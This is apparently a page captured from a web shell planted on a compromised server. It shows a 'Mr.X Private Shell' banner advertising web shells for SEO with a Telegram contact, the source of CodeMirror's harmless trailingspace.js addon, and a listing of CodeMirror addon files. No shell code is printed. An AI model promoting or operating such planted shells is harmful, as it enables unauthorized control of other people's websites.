__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
// CodeMirror, copyright (c) by Marijn Haverbeke and others
// Distributed under an MIT license: https://codemirror.net/5/LICENSE
(function(mod) {
if (typeof exports == "object" && typeof module == "object") // CommonJS
mod(require("../../lib/codemirror"));
else if (typeof define == "function" && define.amd) // AMD
define(["../../lib/codemirror"], mod);
else // Plain browser env
mod(CodeMirror);
})(function(CodeMirror) {
CodeMirror.defineOption("showTrailingSpace", false, function(cm, val, prev) {
if (prev == CodeMirror.Init) prev = false;
if (prev && !val)
cm.removeOverlay("trailingspace");
else if (!prev && val)
cm.addOverlay({
token: function(stream) {
for (var l = stream.string.length, i = l; i && /\s/.test(stream.string.charAt(i - 1)); --i) {}
if (i > stream.pos) { stream.pos = i; return null; }
stream.pos = l;
return "trailingspace";
},
name: "trailingspace"
});
});
});
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| closebrackets.js | File | 6.96 KB | 0664 |
|
| closebrackets.min.js | File | 3.53 KB | 0664 |
|
| closebrackets.min.js.gz | File | 1.45 KB | 0664 |
|
| closetag.js | File | 8.34 KB | 0664 |
|
| closetag.min.js | File | 3.51 KB | 0664 |
|
| closetag.min.js.gz | File | 1.54 KB | 0664 |
|
| continuelist.js | File | 3.9 KB | 0664 |
|
| continuelist.min.js | File | 1.51 KB | 0664 |
|
| continuelist.min.js.gz | File | 847 B | 0664 |
|
| matchbrackets.js | File | 6.66 KB | 0664 |
|
| matchbrackets.min.js | File | 3.06 KB | 0664 |
|
| matchbrackets.min.js.gz | File | 1.32 KB | 0664 |
|
| matchtags.js | File | 2.3 KB | 0664 |
|
| matchtags.min.js | File | 1.31 KB | 0664 |
|
| matchtags.min.js.gz | File | 600 B | 0664 |
|
| trailingspace.js | File | 1006 B | 0664 |
|
| trailingspace.min.js | File | 504 B | 0664 |
|
| trailingspace.min.js.gz | File | 318 B | 0664 |
|